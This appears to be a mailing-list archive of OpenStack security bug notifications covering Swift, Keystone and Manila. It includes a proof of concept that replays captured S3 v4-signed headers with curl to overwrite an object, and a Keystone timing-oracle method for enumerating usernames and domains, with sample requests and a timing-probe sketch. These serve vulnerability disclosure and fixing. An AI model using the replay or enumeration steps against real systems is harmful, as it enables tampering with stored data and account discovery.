* TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1792047 at bugs.launchpad.net Thu Mar 21 14:56:30 2019 From: 1792047 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 21 Mar 2019 14:56:30 -0000 Subject: [Openstack-security] [Bug 1792047] Fix included in openstack/keystone 15.0.0.0rc1 References: <153670878287.17124.3225642471309073829.malonedeb@chaenomeles.canonical.com> Message-ID: <155318019093.10444.14741881233120587464.malone@wampee.canonical.com> This issue was fixed in the openstack/keystone 15.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1792047 Title: keystone rbacenforcer not populating policy dict with view args Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) rocky series: Fix Committed Status in OpenStack Identity (keystone) stein series: Fix Released Bug description: The old @protected decorator pushed the view arguments into the policy_dict for enforcement purposes[0]. This was missed in the new RBACEnforcer. [0] https://github.com/openstack/keystone/blob/294ca38554bb229f66a772e7dba35a5b08a36b20/keystone/common/authorization.py#L152 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1792047/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 22 13:37:35 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 22 Mar 2019 13:37:35 -0000 Subject: [Openstack-security] [Bug 1816836] Fix included in openstack/manila 8.0.0.0rc1 References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155326185600.18358.10548555287180305909.malone@gac.canonical.com> This issue was fixed in the openstack/manila 8.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From morgan.fainberg at gmail.com Mon Mar 25 10:15:47 2019 From: morgan.fainberg at gmail.com (Morgan Fainberg) Date: Mon, 25 Mar 2019 10:15:47 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155350894732.18322.11613685004239826838.malone@gac.canonical.com> Keystone is fixed with oslo.cache fix, marked as invalid for keystone ** Changed in: keystone Status: Triaged => Invalid -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in oslo.cache: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. 
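The report above quotes python-memcached's own docstring for the flush_on_reconnect flag. As a minimal illustration of the suggested fix, passing the flag when constructing the client looks like the following (server addresses are placeholders; how oslo.cache ultimately exposes this depends on its backend configuration, so only the raw python-memcached usage is shown):

```python
# Minimal illustration of enabling python-memcached's flush_on_reconnect
# flag, which the report identifies as the way to avoid serving stale data
# after a network partition heals. Server addresses are placeholders.
import memcache

client = memcache.Client(
    ['10.0.0.11:11211', '10.0.0.12:11211'],
    flush_on_reconnect=True,  # flush a server's cache when it reconnects
)

client.set('some_key', 'some_value', time=300)
print(client.get('some_key'))
```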
To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1765834 at bugs.launchpad.net Mon Mar 25 17:07:23 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 25 Mar 2019 17:07:23 -0000 Subject: [Openstack-security] [Bug 1765834] Fix included in openstack/swift 2.21.0 References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155353364322.17795.16964866051519343160.malone@gac.canonical.com> This issue was fixed in the openstack/swift 2.21.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... 
DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: 
signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... 
* TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From gagehugo at gmail.com Mon Mar 25 19:24:57 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Mon, 25 Mar 2019 19:24:57 -0000 Subject: [Openstack-security] [Bug 1795800] Re: Timing oracle in core auth plugin simplifies brute-forcing usernames References: <153854884921.22301.15072922945681177517.malonedeb@gac.canonical.com> Message-ID: <155354189743.19092.6711145921986360383.malone@chaenomeles.canonical.com> Still working on this, I've gotten a flask hook setup to catch any unauthorized, allowing us to delay the Unauthorized exception until the very end, however I'm still not seeing identical times. Local testing is showing .480 seconds for an existing user while it's gone from ~0.022 to ~0.033 for invalid users with delaying the exception. I'm wondering if this is due to the delay with generating a token for successful authentication, instead of simply continuing on when failing to authenticate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1795800 Title: Timing oracle in core auth plugin simplifies brute-forcing usernames Status in OpenStack Identity (keystone): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The response times for POST /v3/auth/tokens are significantly higher for valid usernames compared to those of invalid ones, making it possible to enumerate users on the system. 
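The raw request/response pairs are shown in the examples below. As a rough sketch of how the reported timing difference could be observed, one might average repeated token requests for a candidate username against a baseline known-invalid one; the hostname, usernames and password here are placeholders taken from the report, and this is illustrative only:

```python
# Illustrative timing probe for the response-time difference described in
# this report. Hostname, usernames and password are placeholders; this is
# just a sketch of the measurement, not a tool.
import time
import requests

URL = 'http://hostname:5000/v3/auth/tokens'


def auth_time(username, attempts=10):
    body = {
        "auth": {
            "identity": {
                "methods": ["password"],
                "password": {
                    "user": {
                        "name": username,
                        "domain": {"name": "Default"},
                        "password": "not-the-real-password",
                    }
                },
            }
        }
    }
    total = 0.0
    for _ in range(attempts):
        start = time.time()
        requests.post(URL, json=body, timeout=10)
        total += time.time() - start
    return total / attempts


print('baseline (invalid user):', auth_time('nonexisting'))
print('candidate user         :', auth_time('admin'))
```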
Examples: # For invalid username + Request POST /v3/auth/tokens HTTP/1.1 Host: hostname:5000 Connection: close Content-Length: 141 Content-Type: application/json { "auth":{ "identity":{ "methods":[ "password" ], "password":{ "user":{ "name":"nonexisting", "domain":{ "name":"Default" }, "password":"devstacker" } } } } } + Response Time: <150ms # For valid username ('admin' in this case) + Request POST /v3/auth/tokens HTTP/1.1 Host: hostname:5000 Connection: close Content-Length: 139 Content-Type: application/json { "auth":{ "identity":{ "methods":[ "password" ], "password":{ "user":{ "name":"admin", "domain":{ "name":"Default" }, "password":"devstacker" } } } } } + Response time: >600ms # Tested version v3.8 [UPDATE 3 Oct 2018 5:01 AEST] Looks like it's also possible to enumerate for valid "domain" too. There're 2 ways that I can see: * With valid username: use the above user enum bug to guess the valid username, then brute the "domain" parameter. Response times are significantly higher for valid compared to invalid domains. * Without valid username: get a baseline response time using invalid username AND invalid domain name. Bruteforce the "domain" param until the response time hits an average high. For me invalid domain falls in the 90-100ms range whereas valid ones show 100+ms. This one looks a bit more obscure i.e. timing difference is not as distinguishable, but should still be recognizable with a good sample size. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1795800/+subscriptions From 1816836 at bugs.launchpad.net Tue Mar 26 21:51:22 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 26 Mar 2019 21:51:22 -0000 Subject: [Openstack-security] [Bug 1816836] Fix included in openstack/manila 7.2.0 References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155363708295.9976.13358468866954796839.malone@wampee.canonical.com> This issue was fixed in the openstack/manila 7.2.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1765834 at bugs.launchpad.net Wed Mar 27 21:11:13 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 27 Mar 2019 21:11:13 -0000 Subject: [Openstack-security] [Bug 1765834] Fix proposed to swift (feature/losf) References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155372107395.18089.3234092110919133996.malone@gac.canonical.com> Fix proposed to branch: feature/losf Review: https://review.openstack.org/648245 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... 
DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: 
signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': 